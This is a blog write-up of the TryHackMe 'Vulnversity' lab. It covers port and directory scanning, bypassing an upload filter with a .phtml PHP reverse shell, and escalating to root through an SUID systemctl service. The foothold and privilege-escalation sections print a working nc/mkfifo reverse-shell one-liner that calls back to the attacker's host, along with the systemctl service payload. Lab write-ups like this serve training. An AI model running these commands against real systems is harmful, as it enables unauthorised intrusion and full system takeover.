---
title: Vulnversity
subtitle: Learn about active recon, web app attacks and privilege escalation.
tags:
- Linux
- Gobuster
- BurpSuite
- Reverse Shell - php
- SUID - systemctl
thumbnail-img: assets/img/vulnversity/vulnversity1.png
---

<img title="" src="../../assets/img/vulnversity/vulnversity1.png" alt="" data-align="center">{: .mx-auto.d-block :}

This is a **free** [room](https://tryhackme.com/room/vulnversity) from [TryHackMe](https://tryhackme.com), created by [tryhackme](https://tryhackme.com/p/tryhackme).

{: .box-warning}

**Disclaimer:** No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️

# Setting-up the Environment

First of all, we are going to connect to the **VPN** using my custom [script](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/vpn.sh) that I have defined the path of the script in the [`.zshrc`](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) file.

```bash
❯ which vpn
vpn: aliased to sh ~/dotfiles/scripts/vpn.sh

❯ vpn thm
```

Then, start the machine and now we are going to use this [**script**](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/thm.sh) to add the *IP* address and **hostname** of this box to the **hosts** file, **allow connections from the target** to our machine and create our working directory. 

```bash
❯ which thm
thm: aliased to sh ~/dotfiles/scripts/thm.sh
```

We will run the script and write the information of this machine.

```python
❯ thm 
[!] /etc/hosts file restored from /etc/hosts.bak
[?] Type the IP address of the box: 10.10.154.145
[?] Type the name of the box: Vulnversity

[!] Try Hack Me Machine
10.10.154.145 Vulnversity.thm

[!] Firewall
Status: active

     To                         Action      From
     --                         ------      ----
[ 1] Anywhere                   ALLOW IN    10.10.154.145             

[!] Working directory created
[!] Initial configuration completed
```

# 1. Enumeration

Now we can simply ping to domain name of the machine to check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 vulnversity.thm
PING Vulnversity.thm (10.10.154.145) 56(84) bytes of data.
64 bytes from Vulnversity.thm (10.10.154.145): icmp_seq=1 ttl=63 time=48.5 ms

--- Vulnversity.thm ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
```

To identify which operating system is the target running. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool.

```python
❯ whichSystem.py vulnversity.thm

vulnversity.thm (ttl -> 1): Linux
```

{: .box-note}

By default Linux has a TTL of 64 and Windows has 128.

## 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

- [-p-](https://nmap.org/book/nmap-overview-and-demos.html) : scan every TCP port [0-65535].
- [--open](https://nmap.org/book/man-port-scanning-basics.html) : show only the applications that are actively accepting TCP connections.
- [-sS](https://nmap.org/book/man-port-scanning-techniques.html) : set TCP SYN scan.
- [--min-rate 5000](https://nmap.org/book/man-performance.html) : send packets as fast as or faster than the given rate.
- [-vvv](https://nmap.org/book/osdetect-usage.html#osdetect-ex-scanme1) : increase the verbosity.
- [-n](https://nmap.org/book/host-discovery-dns.html) : No DNS resolution.
- [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
- {name}.thm : Target machine.
- [-oG](https://nmap.org/book/output-formats-grepable-output.html) : Grepeable output.
- allPorts : Output file name.

```python
❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn vulnversity.thm -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-07 18:46 CEST
Initiating SYN Stealth Scan at 18:46
Scanning vulnversity.thm (10.10.154.145) [65535 ports]
Discovered open port 22/tcp on 10.10.154.145
Discovered open port 21/tcp on 10.10.154.145
Discovered open port 445/tcp on 10.10.154.145
Discovered open port 139/tcp on 10.10.154.145
Discovered open port 3128/tcp on 10.10.154.145
Discovered open port 3333/tcp on 10.10.154.145
Completed SYN Stealth Scan at 18:46, 20.81s elapsed (65535 total ports)
Nmap scan report for vulnversity.thm (10.10.154.145)
Host is up, received user-set (0.076s latency).
Scanned at 2022-08-07 18:46:05 CEST for 21s
Not shown: 57621 closed tcp ports (reset), 7908 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack ttl 63
22/tcp   open  ssh          syn-ack ttl 63
139/tcp  open  netbios-ssn  syn-ack ttl 63
445/tcp  open  microsoft-ds syn-ack ttl 63
3128/tcp open  squid-http   syn-ack ttl 63
3333/tcp open  dec-notes    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 20.93 seconds
           Raw packets sent: 103181 (4.540MB) | Rcvd: 62028 (2.481MB)
```

This is the function that I have defined in the [zsh](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) configuration file to extract TCP ports.

```bash
❯ which extractPorts
extractPorts () {
    ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" 
    ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" 
    echo -e "\n${yellowColour}[*] Extracting information...${endColour}\n"
    echo -e "\t${grayColour}[*] IP Address:${endColour} ${greenColour} $ip_address${endColour}"
    echo -e "\t${grayColour}[*] Open ports:${endColour} ${redColour} $ports${endColour}\n"
    echo $ports | tr -d '\n' | xclip -sel clip
    echo -e "${blueColour}[*] Ports copied to clipboard${endColour}\n"
}
```

Use the command to extract the **TCP ports**.

```python
❯ extractPorts allPorts

[*] Extracting information...

    [*] IP Address:  10.10.154.145
    [*] Open ports:  21,22,139,445,3128,3333

[*] Ports copied to clipboard
```

We will see the open ports on the target machine so now, we are going to use [nmap](https://nmap.org/) again using the parameters below:

- [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
- [-sC](https://nmap.org/book/man-nse.html) : to performs a script scan using the default set of scripts.
- [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
- [-p](https://nmap.org/book/scan-methods-ip-protocol-scan.html) : to determine which IP protocols are supported by target machine.
- {name}.thm : Target machine.
- [-oN](https://nmap.org/book/output-formats-normal-output.html) : Normal output.
- targeted : Output file name.

```python
❯ nmap -sV -sC -Pn -p21,22,139,445,3128,3333 vulnversity.thm -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-07 18:49 CEST
Nmap scan report for vulnversity.thm (10.10.154.145)
Host is up (0.057s latency).
rDNS record for 10.10.154.145: Vulnversity.thm

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2022-08-07T12:49:34-04:00
| smb2-time: 
|   date: 2022-08-07T16:49:34
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.09 seconds
```

{: .box-error}

You can find the man page of nmap [here](https://nmap.org/book/toc.html).

## 1.2 Gobuster

Now we will use [Gobuster](https://www.kali.org/tools/gobuster/) to locate a directories.

- -u: The target URL.

- -w: Path to your word-list.

```python
❯ gobuster dir -u http://vulnversity.thm:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://vulnversity.thm:3333
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/08/07 18:51:31 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 326] [--> http://vulnversity.thm:3333/images/]
/css                  (Status: 301) [Size: 323] [--> http://vulnversity.thm:3333/css/]   
/js                   (Status: 301) [Size: 322] [--> http://vulnversity.thm:3333/js/]    
/fonts                (Status: 301) [Size: 325] [--> http://vulnversity.thm:3333/fonts/] 
/internal             (Status: 301) [Size: 328] [--> http://vulnversity.thm:3333/internal/]
[!] Keyboard interrupt detected, terminating.

===============================================================
2022/08/07 18:51:55 Finished
===============================================================
```

In the browser we will see that we can upload files, so we will try to upload a file with `.php` extension.

![](../../assets/img/vulnversity/vulnversity2.png){: .mx-auto.d-block :}

## 1.3 BurpSuite

Using **BurpSuite** we will upload a reverse shell found in the path `/usr/share/webshells/php/php-reverse-shell.php`, edited with our address and capture the package.

![](../../assets/img/vulnversity/vulnversity3.png){: .mx-auto.d-block :}

We send the request to **Intruder**, add a payload marker to the file extension in order to make the same request but with a different extension.

![](../../assets/img/vulnversity/vulnversity4.png){: .mx-auto.d-block :}

In the **payloads** tab we add the **extensions** we are going to use.

![](../../assets/img/vulnversity/vulnversity5.png){: .mx-auto.d-block :}

We start the 'Attack', at the end we see that one of the requests was successful with the extension `.phtml`.

![](../../assets/img/vulnversity/vulnversity6.png)

{: .mx-auto.d-block :}

# 2. Foothold

We check the `/internal/uploads/` page and see that our file is now on the server.

![](../../assets/img/vulnversity/vulnversity7.png){: .mx-auto.d-block :}

We visit our **file** to run it and get a `reverse shell`. Grab the **user flag**!

```bash
❯ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.18.67.82] from (UNKNOWN) [10.10.164.246] 55516
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 17:39:14 up 36 min,  0 users,  load average: 0.16, 0.06, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cd /home/
$ ls
bill
$ cd bill
$ ls
user.txt
$ cat user.txt
```

## 2.1 Privilege Escalation

Now that we have a **shell** on the machine we can find a way to get root permissions, we start by enumerating the **SUID** files with `find`.

```bash
www-data@vulnuniversity:/$ find / \-perm -4000 2> /dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
```

We can see that among the binaries there is **systemctl**, so we are going to use it to obtain `root privileges`, with the following commands using this [article](https://gtfobins.github.io/gtfobins/systemctl/).

First we create a file which will execute a reverse shell:

```bash
www-data@vulnuniversity:/home/bill$ cd /tmp
www-data@vulnuniversity:/tmp$ vim shell.sh
www-data@vulnuniversity:/tmp$ cat shell.sh 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.18.67.82 1337 >/tmp/f
```

We create a `service` and run it with **systemctl**.

```bash
TF=$(mktemp).service

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash /tmp/shell.sh"
[Install]
WantedBy=multi-user.target' > $TF

/bin/systemctl link $TF
/bin/systemctl enable --now $TF
```

We obtain a **shell** with the **root user** and get the <u>root flag</u>!

```bash
❯ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.18.67.82] from vulnversity.thm [10.10.164.246] 42540
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# pwd
/
# cd root
# ls
root.txt
# cat root.txt
```

I hope you made it too, see you next timee! 🙃
